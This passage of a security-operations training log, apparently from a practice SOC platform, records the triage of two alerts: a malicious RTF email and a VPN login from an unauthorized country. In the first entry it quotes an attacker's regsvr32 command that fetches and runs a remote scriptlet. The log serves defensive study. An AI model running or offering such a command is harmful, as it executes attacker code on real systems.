Ilarai97/soc-/01-Live-SOC-Monitoring/triage-log.md

 -The hash address from which it was send was found to be malicious and belonged to contained mail.rtf .
 Attackers have historically used RTF documents to deliver or trigger malicious content.
 -The given command "regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll" was found suspicious and an indicator of regsvr32.exe abuse .

+**Classification:** True Positive - Malicious

 **Action taken:** We have contained the action for further assessment and deleted the email from the host mail.

 **Time of triage:** 20mins

+**Alert #5**

+**Date:** 2024-02-13  2:04:00 AM

+**Severity:** Low

+**Source IP:** 113.161.158.12

+**Target:** Monica (monica@letsdefend.io)

+**Hypothesis:**  VPN Connection Detected from Unauthorized Country

+**Evidence:** On 2024-02-13  2:04:00  AM our host "Monica" ip address "172.16.17.163 " received an "VPN Connection Detected from Unauthorized Country" alert .
+-The alert source address was "113.161.158.12" which belonged to  "VNPT Corporation" , Vietnam and is shown malicious when tested .
+-The destination address "33.33.33.33" to which the attacker is trying to connect is claimed to be malicious as well and belongs to "United States Department of Defense (DoD)" , US .
+-We didnt find anything that would cause a big problem and there were no data loss as well

+**Classification:** True positive - Malicious

+**Action Taken:** -Nothing since it is not a big issue

+**Time to triage:** 15mins